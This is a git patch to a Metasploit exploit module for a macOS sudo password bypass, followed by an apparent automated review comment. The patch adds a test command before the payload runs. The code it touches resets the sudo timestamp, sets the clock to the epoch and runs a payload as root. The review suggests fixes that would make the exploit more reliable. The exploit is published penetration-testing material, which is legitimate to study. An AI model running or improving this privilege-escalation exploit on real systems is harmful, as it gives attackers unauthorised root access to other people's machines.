From 3ce23ffb49cd30f944e85ac493c28198e8cbad98 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 24 Aug 2013 11:20:47 -0500 Subject: [PATCH] Make a test before running the payload --- .../osx/local/sudo_password_bypass.rb | 41 +++++++++++++------ 1 file changed, 28 insertions(+), 13 deletions(-) diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index 47d4b5382f..e7468097bd 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -160,14 +160,6 @@ class Metasploit3 < Msf::Exploit::Local private def run_sudo_cmd - sudo_cmd_raw = if using_native_target? - ['sudo', '-S', [drop_path].shelljoin].join(' ') - elsif using_cmd_target? - ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ') - end - - ## to prevent the password prompt from destroying session - sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true' print_status("Resetting user's time stamp file and setting clock to the epoch") cmd_exec( 
@@ -176,14 +168,37 @@ class Metasploit3 < Msf::Exploit::Local " -setdate 01:01:1970 -settime 00:00" ) + # Run Test + test = rand_text_alpha(4 + rand(4)) + sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ') + + print_status("Executing test...") + output = cmd_exec('echo "" | ' + sudo_cmd_test) + + if output =~ /incorrect password attempts\s*$/i + fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.") + elsif output =~ /#{test}/ + print_good("Test executed succesfully. Running payload.") + else + print_error("Unknown fail while testing, trying to execute the payload anyway...") + end + + + # Run Payload + sudo_cmd_raw = if using_native_target? + ['sudo', '-S', [drop_path].shelljoin].join(' ') + elsif using_cmd_target? + ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ') + end + + ## to prevent the password prompt from destroying session + ## backgrounding the sudo payload in order to keep both sessions usable + sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true' + print_status "Running command: " print_line sudo_cmd output = cmd_exec(sudo_cmd) - if output =~ /incorrect password attempts\s*$/i - fail_with(Exploit::Failure::NotFound, - "User has never run sudo, and is therefore not vulnerable. Bailing.") - end - #print_good output + end # cmd_exec doesn't allow to get a session, so there is no way to make the cleanup
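Review bot: The test command on the `sudo_cmd_test` line is built with `["echo #{test}"].shelljoin`, which backslash-escapes the space, so the remote shell hands sudo the single argument `echo <token>` instead of `echo` plus the token; sudo would then most likely report that command as not found, and because that error text contains the token, the `elsif output =~ /#{test}/` branch reports success on what is really a failed run. Building the argv as a list, `sudo_cmd_test = ['sudo', '-S', 'echo', test].shelljoin`, mirrors how the payload command is assembled a few lines below and makes the token appear only when the command actually ran. The `/incorrect password attempts\s*$/i` check carried over from the old code matches only the plural form; if sudo reports a single failed attempt in the singular, the not-vulnerable case falls through to the "Unknown fail" branch and the payload is run anyway, so `attempts?` would be the safer pattern. The print_good message also misspells "successfully".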